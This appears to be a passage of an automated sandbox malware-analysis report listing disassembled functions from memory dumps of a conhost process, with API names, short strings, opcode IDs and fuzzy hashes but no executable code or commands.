                                                        Function 000001B0BB993DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: b0a81d200032d86ad38d316e1880028995d8a3141c355d29fd8f9425fb66d309
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: AB115E39214E4087E7B18B52E98435A76A0F78DFE4F044219EA9AC77A5CF78C4148744
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB983790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 411fd60a1f16dd2e88446c120427be7865b76b9799b2deab0c6ca42901cc0f25
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: FD113C3A708B4183FF659B22F5046AA72B0F749BC5F444029EE8987764EF3DC505C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB985B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 500358b5d55420f6b7e44d89d5364171a30b7326fec8f68509e9868970bc3ca9
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 02D1897A208F9882DB719B16E99439B77A0F78DBC4F110116EA8D87BA5DF3CC545CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB982F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 089657c911624ca5745a56f043cfbe9acda64173e545b2775df41812c2f17173
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: C3315F3A701F5183E666DF169A407AA7790FB4ABC4F0841249E4887B55EF34C461C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 6feecfa75cba948cb456dc004c2eb29c23fa3216b8950edd8b9abb0b875a267b
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 9F114D3D201E5843FA76A7215B553AB3152DF8FBF4F144728A836D66EADF68C4018610
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 03c623da116ef67c9c0d32323dd984a926e11518bc05ea2350850e6209fc2daa
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: C6011B35300E4083EB65DB52E95879A73A5FB8DBC4F488039DE9993755DF38C549C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: e3f3324468e23014e45b528825527c3e6b72a87fb8f00ad4e83e310966b7f946
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 37011779215F4083FB769B22EA4879B72B0FB4EB86F044428D98987B65EF3DC1088710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB989005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 186f5b9772127374aeffd287d2a08f1cb98be70df2387860505d511e0080f38b
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 25518E3A615A008BEB67DB15EE48B9A3796F34ABC8F50D524DA4783788DF75C841C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB988FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: da40f04bb2948effe222ddafeee504dd6d7f2d75d518595489d269d129bae8f8
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 0B31BF3A204A4097E776DF11ED4879A37A5F34ABC8F059418EE8783789DF39C940C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB981A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 3a0f63169b35a715b6c2959e190cbcb935333b6122cdae920269f4ca29fc6972
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: C7F03C76304A4193EBB18B21FAC479A7760FB4DBC8F848025DA8986954DF2CC68DCB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB983044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 835f31e3c894f6acd4879f139cc5c1582497ebb4e98aea5d27d4fddc14066169
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: E9F05838608F8483EBA18F13BA0419A7260EB4DFC0F088128EE8A87B18DF2CC485C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 5356f6fb3750f8506e4f22958509b714051eb562be49930f01226f9c0de99fd1
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 05F06279211E0483FB718B29E94539B7320EB8E7A1F54021DCAAAC52E4CF3DC045C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 2c89a862cb55d2a8c980a434173d17a4b014624db5cef7d07aa726abdd436e7d
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EC02A73A219B8487EB61CB55E99079BB7A1F3CA7D4F104015EA8E87BA9DF7CC454CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB985710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: bf016a582cb42783d07870e10c58c4570bcbe4ab660ca89ad760f02accc2f5dd
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: D761A33A619E84C7E7718B15EA4439BB7A0F38D794F504116EA8E87BA8EF7CC544CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB994104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: e92d809900a1e8233ce787c337b0df4a5c6d9c3f7035722c980c88031a215828
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 3411513AA20E5113F6FB5669D6673E73145EB7C3B8F18862CA9F6867D6CF24C8414201
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB963504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 44a515f911aa13fb0530074d09c6582c9fec5027f9f6840fb0570ee24fdd604a
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 3F11913AA1CE1113FB76192CE7413EB3390EB5D374F588729AD6B876E69F28C841C100
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB95F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 2e87d0fc947d2a528583efde5cfaf2800fb3a8064dc66eee5400f6487445ab6b
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: FB61C17E680F0483FA778B29E7403EB7AA0E7AE760F548415CE0A937A4DF34C8458310
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: cf6460fe73c7d77c40ebef720349f4b8c2403eaa0b0bf517143fe4a4a877f792
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: A561563A600B848AEB25DF65DA803DE77A1F349BC8F045215EF4A57BA8DF78C595C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: a6afa8376d9776bba77c3ed8978bb257e1f5d2d09d65b72f42a1cf49e6c00453
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: F1519F7A100E80CBEB798F159A8439E77A0F75ABD4F184215DA99C7BD5CF38D491C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB95A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: f1897d4be56fbe81b33b08534ce5637962a00360a38113473d30ad81bc599b9d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 1551903A140B84CBEB7B8F25964439E77A0F369B98F188116DA89C7BD5CF38D491C708
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB958405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: c95ca1c51dabbce49b0b4df0f581ec1a112f12749e3785ae99df035bf196c675
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 8551AB3A651B008BEB37CF15E684B9A3799F368B98F508164DE4783788EF34D8428B04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 219dfdab24475d8746ba74a886e252c61bb93e159903f682ed7d8cce1e9cc482
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 17318A3A211B4097EB379F11E98479A37A4F368B88F458014EE5B83785DF38D941C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB992058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: a4e1e7e1717ff322f57a31a21cfe81a1ca8fcb1273233c841be29153a3399d83
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 14D1D036714E808AE762CFA9D6403ED3BB1F359B98F14821ACE9997B99DF34C416C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9814A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: e650c2cfd8f2a67c7857e70869281234a2778628f1bcd30337712c696f864ebc
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: C0115E7A504E90D7E7B6DF66AA0418A77A0F78DFC5F048029DA899372ADF34C451C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB992980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 37cfcfd0819629a6c31e1f20f817aff421e14af81e2c9d0ad8073f4b4aae43eb
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 3391AD3A600E5487F7B29F7996803EE3BA4F749B88F14411DDE8AA7A95DF34C486C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB987960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: d3019a75ec8cdb39dfaee9deeb1709434ad7af592a6d46799f9ddb4923763fb2
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 11115E3A710F158AEF60CF60E9553EA33A4F71E758F440E25DA6D867A4DF78D1988380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 319f9652b99f525055038a83e84740e41b75fd1cd59cbe1df669afe486ad09a3
